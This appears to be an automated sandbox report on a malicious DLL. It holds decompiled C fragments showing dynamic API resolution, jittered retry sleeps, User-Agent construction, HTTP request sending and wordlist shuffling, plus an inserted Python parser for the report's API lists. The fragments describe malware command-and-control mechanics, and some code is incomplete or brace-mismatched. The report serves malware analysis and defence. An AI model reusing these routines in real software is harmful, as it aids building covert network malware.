                                • 351: 1000102d-10001062 GetModuleHandleA GetProcAddress
                                • 352: 100010e0-100010e6 call 1000167e
                                • 353: 10001064-10001078 GetProcAddress
                                • 354: 100010ef-100010f6
                                • 355: 1000107a-1000108e GetProcAddress
                                • 357: 10001090-100010a4 GetProcAddress
                                • 359: 100010a6-100010ba GetProcAddress
                                • 360: 100010bc-100010cd call 1000119d
                                • 362: 100010d2-100010d7
                                • 363: 100010d9-100010de
                                Edges: 347->350, 347->351, 350->354, 351->352, 351->353, 352->354, 353->352, 353->355, 355->352, 355->357, 357->352, 357->359, 359->352, 359->360, 360->362, 362->352, 362->363, 363->354
                                C-Code - Quality: 100%
                                			E10001015(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                				intOrPtr _v8;
                                				_Unknown_base(*)()* _t29;
                                				_Unknown_base(*)()* _t33;
                                				_Unknown_base(*)()* _t36;
                                				_Unknown_base(*)()* _t39;
                                				_Unknown_base(*)()* _t42;
                                				intOrPtr _t46;
                                				struct HINSTANCE__* _t50;
                                				intOrPtr _t56;
                                
                                				_t56 = E10001B5A(0x20);
                                				if(_t56 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t50 = GetModuleHandleA( *0x10004144 + 0x10005014);
                                					_v8 = 0x7f;
                                					_t29 = GetProcAddress(_t50,  *0x10004144 + 0x10005151);
                                					 *(_t56 + 0xc) = _t29;
                                					if(_t29 == 0) {
                                						L8:
                                						E1000167E(_t56);
                                					} else {
                                						_t33 = GetProcAddress(_t50,  *0x10004144 + 0x10005161);
                                						 *(_t56 + 0x10) = _t33;
                                						if(_t33 == 0) {
                                							goto L8;
                                						} else {
                                							_t36 = GetProcAddress(_t50,  *0x10004144 + 0x10005174);
                                							 *(_t56 + 0x14) = _t36;
                                							if(_t36 == 0) {
                                								goto L8;
                                							} else {
                                								_t39 = GetProcAddress(_t50,  *0x10004144 + 0x10005189);
                                								 *(_t56 + 0x18) = _t39;
                                								if(_t39 == 0) {
                                									goto L8;
                                								} else {
                                									_t42 = GetProcAddress(_t50,  *0x10004144 + 0x1000519f);
                                									 *(_t56 + 0x1c) = _t42;
                                									if(_t42 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                										_t46 = E1000119D(_t56, _a12); // executed
                                										_v8 = _t46;
                                										if(_t46 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a16 = _t56;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}

                                APIs
                                  • Part of subcall function 10001B5A: HeapAlloc.KERNEL32(00000000,?,10001567,00000030,74E063F0,00000000), ref: 10001B66
                                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001135,?,?,?,?,?,00000002,?,?), ref: 10001039
                                • GetProcAddress.KERNEL32(00000000,?), ref: 1000105B
                                • GetProcAddress.KERNEL32(00000000,?), ref: 10001071
                                • GetProcAddress.KERNEL32(00000000,?), ref: 10001087
                                • GetProcAddress.KERNEL32(00000000,?), ref: 1000109D
                                • GetProcAddress.KERNEL32(00000000,?), ref: 100010B3
                                  • Part of subcall function 1000119D: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 100011FA
                                  • Part of subcall function 1000119D: memset.NTDLL ref: 1000121C
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                • String ID:
                                • API String ID: 1632424568-0
                                • Opcode ID: 561e4cdbb971f4d8e66d7611e3d00db434181d84937a82a0bb5f0063f0d53984
                                • Instruction ID: 2943e8e674912cac2eae58d6d970e7e89ef88163b07fe81432c65c35558539c2
                                • Opcode Fuzzy Hash: 561e4cdbb971f4d8e66d7611e3d00db434181d84937a82a0bb5f0063f0d53984
                                • Instruction Fuzzy Hash: 70214DB060074AAFE711DFAACC90A9BB7ECEF443C17018466F544C7219EBB1E944CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 74%
                                			E00D42789(void* __ecx, void* __edx, intOrPtr _a4) {
                                				struct _FILETIME _v12;
                                				void* _t10;
                                				void* _t12;
                                				int _t14;
                                				signed int _t16;
                                				void* _t18;
                                				signed int _t19;
                                				unsigned int _t23;
                                				void* _t27;
                                				signed int _t34;
                                
                                				_t27 = __edx;
                                				_push(__ecx);
                                				_push(__ecx);
                                				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                				 *0xd4d238 = _t10;
                                				if(_t10 != 0) {
                                					 *0xd4d1a8 = GetTickCount();
                                					_t12 = E00D49EBB(_a4);
                                					if(_t12 == 0) {
                                						do {
                                							GetSystemTimeAsFileTime( &_v12);
                                							_t14 = SwitchToThread();
                                							_t23 = _v12.dwHighDateTime;
                                							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5; // 64-bit FILETIME >> 5, used as a time-derived seed
                                							_push(0);
                                							_push(0x13);
                                							_push(_t23 >> 5);
                                							_push(_t16);
                                							L00D4B0CA(); // _aullrem (see APIs below): 64-bit unsigned remainder, seed mod 0x13
                                							_t34 = _t14 + _t16;
                                							_t18 = E00D4122B(_a4, _t34);
                                							_t19 = 3;
                                							_t26 = _t34 & 0x00000007;
                                							Sleep(_t19 << (_t34 & 0x00000007)); // executed; 3 << (seed & 7) gives a 3..384 ms jittered delay between retries
                                						} while (_t18 == 1); // retry loop: repeats while E00D4122B returns 1
                                						if(E00D44D4D(_t26) != 0) {
                                							 *0xd4d260 = 1; // executed
                                						}
                                						_t12 = E00D42F70(_t27); // executed
                                					}
                                				} else {
                                					_t12 = 8;
                                				}
                                				return _t12;
                                			}

                                Statement addresses: 0x00d42789 .. 0x00d42834 (call-site addresses are listed under APIs below)

                                APIs
                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,00D47F25,?), ref: 00D4279C
                                • GetTickCount.KERNEL32 ref: 00D427B0
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00D47F25,?), ref: 00D427CC
                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,00D47F25,?), ref: 00D427D2
                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00D427EF
                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,00D47F25,?), ref: 00D4280C
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                • String ID:
                                • API String ID: 507476733-0
                                • Opcode ID: 59da4a926ccd8997ea181a1716f59db1128ec68df43c15340b3f041c93010a8b
                                • Instruction ID: a55952041fffb59202512d2f81e19ca06b8b68b481548b92cb00e11a28b064af
                                • Opcode Fuzzy Hash: 59da4a926ccd8997ea181a1716f59db1128ec68df43c15340b3f041c93010a8b
                                • Instruction Fuzzy Hash: 3311E576A50300BBD760AFB4DC5AB6A76A8DB45351F444129F905C73E0EBB0D8408674
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00D497F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                				void* __esi;
                                				long _t10;
                                				void* _t18;
                                				void* _t22;
                                
                                				_t9 = __eax;
                                				_t22 = __eax;
                                				if(_a4 != 0 && E00D48CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                					L9:
                                					return GetLastError();
                                				}
                                				_t10 = E00D4A85C(_t9, _t18, _t22, _a8); // executed
                                				if(_t10 == 0) {
                                					ResetEvent( *(_t22 + 0x1c));
                                					ResetEvent( *(_t22 + 0x20));
                                					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                                						SetEvent( *(_t22 + 0x1c)); // synchronous completion: signal the event at +0x1c
                                						goto L7;
                                					} else {
                                						_t10 = GetLastError();
                                						if(_t10 == 0x3e5) { // ERROR_IO_PENDING (997): asynchronous send still in progress, treated as success
                                							L7:
                                							_t10 = 0;
                                						}
                                					}
                                					}
                                				}
                                				if(_t10 == 0xffffffff) {
                                					goto L9;
                                				}
                                				return _t10;
                                			}

                                Statement addresses: 0x00d497f7 .. 0x00d4986d (call-site addresses are listed under APIs below)

                                APIs
                                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,00D4937B,?,?,00000000,00000000), ref: 00D49831
                                • ResetEvent.KERNEL32(?), ref: 00D49836
                                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 00D49843
                                • GetLastError.KERNEL32 ref: 00D4984E
                                • GetLastError.KERNEL32(?,?,00000102,00D4937B,?,?,00000000,00000000), ref: 00D49869
                                  • Part of subcall function 00D48CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,00D49816,?,?,?,?,00000102,00D4937B,?,?,00000000), ref: 00D48D06
                                  • Part of subcall function 00D48CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00D49816,?,?,?,?,00000102,00D4937B,?), ref: 00D48D64
                                  • Part of subcall function 00D48CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 00D48D74
                                • SetEvent.KERNEL32(?), ref: 00D4985C
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3739416942-0
                                • Opcode ID: 77bed403aee18e3407a999f4f8d5042835a5fe414810aa2feb58004c2f141ed5
                                • Instruction ID: 7e836ee0920241ae3b3e73fc3ca6f0a426c9fe7e8870ebe559eff5f46f10cfb2
                                • Opcode Fuzzy Hash: 77bed403aee18e3407a999f4f8d5042835a5fe414810aa2feb58004c2f141ed5
                                • Instruction Fuzzy Hash: 09014B31111300ABDB316F3ADC44F1BB6A8EF56364F584A25F551D51E0D621DC05AA71
                                Uniqueness

                                Uniqueness Score: -1.00%
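The "APIs" lists in this report follow one fixed layout: `• Api.MODULE(arg,arg,...), ref: ADDR`, with a `Part of subcall function XXXXXXXX:` prefix for calls reached through a callee, and `?` for arguments the analyser could not recover. The script below is an added example, not part of the Joe Sandbox report or of the sample, that parses those lines into records so that call sites can be turned into debugger breakpoints or a per-module triage summary. The sample input is copied verbatim from the E00D497F7 entry above; the set of "network" modules is an assumption made for triage and not something the report states.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: API-list lines copied verbatim from this report
# (function E00D497F7 and its subcall 00D48CFA).
SAMPLE = """\
• ResetEvent.KERNEL32(?,00000008,?,?,00000102,00D4937B,?,?,00000000,00000000), ref: 00D49831
• ResetEvent.KERNEL32(?), ref: 00D49836
• HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 00D49843
• GetLastError.KERNEL32 ref: 00D4984E
• GetLastError.KERNEL32(?,?,00000102,00D4937B,?,?,00000000,00000000), ref: 00D49869
  • Part of subcall function 00D48CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,00D49816,?,?,?,?,00000102,00D4937B,?,?,00000000), ref: 00D48D06
  • Part of subcall function 00D48CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00D49816,?,?,?,?,00000102,00D4937B,?), ref: 00D48D64
• SetEvent.KERNEL32(?), ref: 00D4985C
"""

# One report line: optional "Part of subcall function XXXXXXXX:" prefix,
# Api.MODULE, optional "(arg,arg,...)", then "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Assumption for triage: modules whose calls imply network activity.
NETWORK_MODULES = {"WININET", "WINHTTP", "WS2_32", "DNSAPI"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple                 # one int per argument, None where the report shows "?"
    ref: int                    # call-site address
    via_subcall: Optional[int]  # callee address when the call is reached through a subcall


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one bullet line; returns None for lines that are not API entries."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = tuple(_parse_arg(t) for t in raw.split(",")) if raw else ()
    sub = m.group("sub")
    return ApiCall(
        api=m.group("api"),
        module=m.group("module").upper(),
        args=args,
        ref=int(m.group("ref"), 16),
        via_subcall=int(sub, 16) if sub else None,
    )


def parse_api_list(text: str) -> List[ApiCall]:
    """Parse a whole APIs block; raises on a line that does not match the layout."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        call = parse_api_line(line)
        if call is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        calls.append(call)
    return calls


def call_sites(calls: List[ApiCall], api: str) -> List[int]:
    """Sorted call-site addresses for one API, e.g. to set breakpoints on the C2 send."""
    return sorted(c.ref for c in calls if c.api == api)


def network_calls(calls: List[ApiCall]) -> List[ApiCall]:
    return [c for c in calls if c.module in NETWORK_MODULES]


def by_module(calls: List[ApiCall]) -> dict:
    """Module -> sorted list of distinct API names, a compact import summary."""
    out: dict = {}
    for c in calls:
        out.setdefault(c.module, set()).add(c.api)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    parsed = parse_api_list(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.module}!{c.api} {c.args}")
    print("network:", [c.api for c in network_calls(parsed)])
    print("breakpoints for HttpSendRequestA:", [hex(a) for a in call_sites(parsed, "HttpSendRequestA")])
```

Running the block prints one line per call (address, module, API, decoded arguments), the calls in the assumed network modules, and the HttpSendRequestA call site; feeding it the other APIs blocks on this page works the same way because they share the layout.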

                                C-Code - Quality: 50%
                                			E00D41128(void** __esi) {
                                				intOrPtr _v0;
                                				intOrPtr _t4;
                                				intOrPtr _t6;
                                				void* _t8;
                                				void* _t9;
                                				intOrPtr _t10;
                                				void* _t11;
                                				void** _t13;
                                
                                				_t13 = __esi;
                                				_t4 =  *0xd4d32c; // 0x32895b0
                                				__imp__(_t4 + 0x40);
                                				while(1) {
                                					_t6 =  *0xd4d32c; // 0x32895b0
                                					_t1 = _t6 + 0x58; // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t8 =  *_t13;
                                				if(_t8 != 0 && _t8 != 0xd4d030) {
                                					HeapFree( *0xd4d238, 0, _t8);
                                				}
                                				_t9 = E00D44A2A(_v0, _t13); // executed
                                				_t13[1] = _t9;
                                				_t10 =  *0xd4d32c; // 0x32895b0
                                				_t11 = _t10 + 0x40;
                                				__imp__(_t11);
                                				return _t11;
                                			}

                                Statement addresses: 0x00d41128 .. 0x00d41185 (call-site addresses are listed under APIs below)

                                APIs
                                • RtlEnterCriticalSection.NTDLL(03289570), ref: 00D41131
                                • Sleep.KERNEL32(0000000A,?,00D430F3), ref: 00D4113B
                                • HeapFree.KERNEL32(00000000,00000000,?,00D430F3), ref: 00D41163
                                • RtlLeaveCriticalSection.NTDLL(03289570), ref: 00D4117F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: e292a230fd14c0e892d3017683b1e2d3e57bfc786b4c11018043d8a2d1c3ea21
                                • Instruction ID: 9e59217c917a962af86b4582371011ff3c3d4787bb82a9d905f94d3584fe1a25
                                • Opcode Fuzzy Hash: e292a230fd14c0e892d3017683b1e2d3e57bfc786b4c11018043d8a2d1c3ea21
                                • Instruction Fuzzy Hash: 62F0D47C611340DFE7209F69EC49B167BA9AB16781B089414F642D6375C620E881DB35
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E00D42F70(signed int __edx) {
                                				signed int _v8;
                                				long _v12;
                                				CHAR* _v16;
                                				long _v20;
                                				void* __edi;
                                				void* __esi;
                                				void* _t21;
                                				CHAR* _t22;
                                				CHAR* _t25;
                                				intOrPtr _t26;
                                				void* _t27;
                                				void* _t31;
                                				void* _t32;
                                				CHAR* _t36;
                                				CHAR* _t42;
                                				CHAR* _t43;
                                				CHAR* _t44;
                                				void* _t49;
                                				void* _t51;
                                				CHAR* _t54;
                                				signed char _t56;
                                				intOrPtr _t58;
                                				signed int _t59;
                                				void* _t62;
                                				CHAR* _t65;
                                				CHAR* _t66;
                                				char* _t67;
                                				void* _t68;
                                
                                				_t61 = __edx;
                                				_v20 = 0;
                                				_v8 = 0;
                                				_v12 = 0;
                                				_t21 = E00D459A4();
                                				if(_t21 != 0) {
                                					_t59 =  *0xd4d25c; // 0x2000000a
                                					_t55 = (_t59 & 0xf0000000) + _t21;
                                					 *0xd4d25c = (_t59 & 0xf0000000) + _t21;
                                				}
                                				_t22 =  *0xd4d160(0, 2); // executed; import not named in the report. The accepted results below (0, 1, 0x80010106 = S_OK, S_FALSE, RPC_E_CHANGED_MODE) are consistent with CoInitializeEx(NULL, COINIT_APARTMENTTHREADED)
                                				_v16 = _t22;
                                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                					_t25 = E00D42B6F( &_v8,  &_v20); // executed
                                					_t54 = _t25;
                                					_t26 =  *0xd4d2a8; // 0x253a5a8
                                					if( *0xd4d25c > 5) { // OS version global (0x2000000a on this w10x64 VM; low byte 0x0a = major version 10); > 5 selects between two string offsets
                                						_t8 = _t26 + 0xd4e5cd; // 0x4d283a53
                                						_t27 = _t8;
                                					} else {
                                						_t7 = _t26 + 0xd4e9f5; // 0x44283a44
                                						_t27 = _t7;
                                					}
                                					E00D49154(_t27, _t27);
                                					_t31 = E00D48E0D(_t61,  &_v20,  &_v12); // executed
                                					if(_t31 == 0) {
                                						CloseHandle(_v20);
                                					}
                                					_t62 = 5;
                                					if(_t54 != _t62) {
                                						 *0xd4d270 =  *0xd4d270 ^ 0x81bbe65d;
                                						_t32 = E00D41525(0x60);
                                						 *0xd4d32c = _t32;
                                						__eflags = _t32;
                                						if(_t32 == 0) {
                                							_push(8);
                                							_pop(0);
                                						} else {
                                							memset(_t32, 0, 0x60);
                                							_t49 =  *0xd4d32c; // 0x32895b0
                                							_t68 = _t68 + 0xc;
                                							__imp__(_t49 + 0x40);
                                							_t51 =  *0xd4d32c; // 0x32895b0
                                							 *_t51 = 0xd4e81a;
                                						}
                                						_t54 = 0;
                                						__eflags = 0;
                                						if(0 == 0) {
                                							_t36 = RtlAllocateHeap( *0xd4d238, 0, 0x43);
                                							 *0xd4d2c8 = _t36;
                                							__eflags = _t36;
                                							if(_t36 == 0) {
                                								_push(8);
                                								_pop(0);
                                							} else {
                                								_t56 =  *0xd4d25c; // 0x2000000a
                                								_t61 = _t56 & 0x000000ff;
                                								_t58 =  *0xd4d2a8; // 0x253a5a8
                                								_t13 = _t58 + 0xd4e55a; // 0x697a6f4d is little-endian "Mozi": the format string here starts a Mozilla/... string
                                								_t55 = _t13;
                                								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xd4c287); // fills the 0x43-byte heap buffer with the browser User-Agent, passing the version byte twice
                                							}
                                							_t54 = 0;
                                							__eflags = 0;
                                							if(0 == 0) {
                                								asm("sbb eax, eax");
                                								E00D47A2E( ~_v8 &  *0xd4d270,  &E00D4D00C); // executed
                                								_t42 = E00D47FBE(_t55); // executed
                                								_t54 = _t42;
                                								__eflags = _t54;
                                								if(_t54 != 0) {
                                									goto L30;
                                								}
                                								_t43 = E00D450E8(); // executed
                                								__eflags = _t43;
                                								if(_t43 != 0) {
                                									__eflags = _v8;
                                									_t65 = _v12;
                                									if(_v8 != 0) {
                                										L29:
                                										_t44 = E00D47C3D(_t61, _t65, _v8); // executed
                                										_t54 = _t44;
                                										goto L30;
                                									}
                                									__eflags = _t65;
                                									if(__eflags == 0) {
                                										goto L30;
                                									}
                                									_t54 = E00D446B2(__eflags,  &(_t65[4]));
                                									__eflags = _t54;
                                									if(_t54 == 0) {
                                										goto L30;
                                									}
                                									goto L29;
                                								}
                                								_t54 = 8;
                                							}
                                						}
                                					} else {
                                						_t66 = _v12;
                                						if(_t66 == 0) {
                                							L30:
                                						if(_v16 == 0 || _v16 == 1) { // only when the initialisation call at the top returned S_OK or S_FALSE
                                							 *0xd4d15c(); // unnamed import; by the pairing with 0xd4d160 this is the matching uninitialise call (inference)
                                						}
                                							goto L34;
                                						}
                                						_t67 =  &(_t66[4]);
                                						do {
                                						} while (E00D48B7B(_t62, _t67, 0, 1) == 0x4c7);
                                					}
                                					goto L30;
                                				} else {
                                					_t54 = _t22;
                                					L34:
                                					return _t54;
                                				}
                                			}

                                Statement addresses: 0x00d42f70 .. 0x00d4314a (call-site addresses are listed under APIs below)

                                APIs
                                  • Part of subcall function 00D459A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,00D42F89,00000000,00000000), ref: 00D459B3
                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00D43006
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • memset.NTDLL ref: 00D43055
                                • RtlInitializeCriticalSection.NTDLL(03289570), ref: 00D43066
                                  • Part of subcall function 00D446B2: memset.NTDLL ref: 00D446C7
                                  • Part of subcall function 00D446B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00D44709
                                  • Part of subcall function 00D446B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 00D44714
                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00D43091
                                • wsprintfA.USER32 ref: 00D430C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                • String ID:
                                • API String ID: 4246211962-0
                                • Opcode ID: 4de65a40a47153b36c75b902c478988fec2fb924cb99ba1f8668f2bd255b80ab
                                • Instruction ID: 3f006011dba1d925f05ea0f6bd970b140311e312b77fc21edc33bcfe50b18240
                                • Opcode Fuzzy Hash: 4de65a40a47153b36c75b902c478988fec2fb924cb99ba1f8668f2bd255b80ab
                                • Instruction Fuzzy Hash: D851E079A01314ABDB21AFB9DC89F6EB7B9EB05B10F184425F501E7251E7B0CA44CB74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 22%
                                			E00D42D74(signed int __eax, signed int _a4, signed int _a8) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				signed int _v20;
                                				intOrPtr _t81;
                                				char _t83;
                                				signed int _t90;
                                				signed int _t97;
                                				signed int _t99;
                                				char _t101;
                                				unsigned int _t102;
                                				intOrPtr _t103;
                                				char* _t107;
                                				signed int _t110;
                                				signed int _t113;
                                				signed int _t118;
                                				signed int _t122;
                                				intOrPtr _t124;
                                
                                				_t102 = _a8;
                                				_t118 = 0;
                                				_v20 = __eax;
                                				_t122 = (_t102 >> 2) + 1;
                                				_v8 = 0;
                                				_a8 = 0;
                                				_t81 = E00D41525(_t122 << 2);
                                				_v16 = _t81;
                                				if(_t81 == 0) {
                                					_push(8);
                                					_pop(0);
                                					L37:
                                					return 0;
                                				}
                                				_t107 = _a4;
                                				_a4 = _t102;
                                				_t113 = 0;
                                				while(1) {
                                					_t83 =  *_t107;
                                					if(_t83 == 0) {
                                						break;
                                					}
                                					if(_t83 == 0xd || _t83 == 0xa) {
                                						if(_t118 != 0) {
                                							if(_t118 > _v8) {
                                								_v8 = _t118;
                                							}
                                							_a8 = _a8 + 1;
                                							_t118 = 0;
                                						}
                                						 *_t107 = 0;
                                						goto L16;
                                					} else {
                                						if(_t118 != 0) {
                                							L10:
                                							_t118 = _t118 + 1;
                                							L16:
                                							_t107 = _t107 + 1;
                                							_t15 =  &_a4;
                                							 *_t15 = _a4 - 1;
                                							if( *_t15 != 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						if(_t113 == _t122) {
                                							L21:
                                							if(_a8 <= 0x20) {
                                								_push(0xb);
                                								L34:
                                								_pop(0);
                                								L35:
                                								E00D48B22(_v16);
                                								goto L37;
                                							}
                                							_t24 = _v8 + 5; // 0xcdd8d2f8
                                							_t103 = E00D41525((_v8 + _t24) * _a8 + 4);
                                							if(_t103 == 0) {
                                								_push(8);
                                								goto L34;
                                							}
                                							_t90 = _a8;
                                							_a4 = _a4 & 0x00000000;
                                							_v8 = _v8 & 0x00000000;
                                							_t124 = _t103 + _t90 * 4;
                                							if(_t90 <= 0) {
                                								L31:
                                								 *0xd4d278 = _t103;
                                								goto L35;
                                							}
                                							do {
                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                								_v12 = _v12 & 0x00000000;
                                								if(_a4 <= 0) {
                                									goto L30;
                                								} else {
                                									goto L26;
                                								}
                                								while(1) {
                                									L26:
                                									_t99 = _v12;
                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                									if(_t99 == 0) {
                                										break;
                                									}
                                									_v12 = _v12 + 1;
                                									if(_v12 < _a4) {
                                										continue;
                                									}
                                									goto L30;
                                								}
                                								_v8 = _v8 - 1;
                                								L30:
                                								_t97 = _a4;
                                								_a4 = _a4 + 1;
                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                								__imp__(_t124);
                                								_v8 = _v8 + 1;
                                								_t124 = _t124 + _t97 + 1;
                                							} while (_v8 < _a8);
                                							goto L31;
                                						}
                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                						_t101 = _t83;
                                						if(_t83 - 0x61 <= 0x19) {
                                							_t101 = _t101 - 0x20;
                                						}
                                						 *_t107 = _t101;
                                						_t113 = _t113 + 1;
                                						goto L10;
                                					}
                                				}
                                				if(_t118 != 0) {
                                					if(_t118 > _v8) {
                                						_v8 = _t118;
                                					}
                                					_a8 = _a8 + 1;
                                				}
                                				goto L21;
                                			}

                                Disassembly: only the address column (0x00d42d7b to 0x00d42efe) survived extraction; the instruction text is not available on this page.

                                APIs
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00D42E71
                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 00D42E86
                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00D42E9D
                                • lstrlen.KERNEL32(69B25F45), ref: 00D42EC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
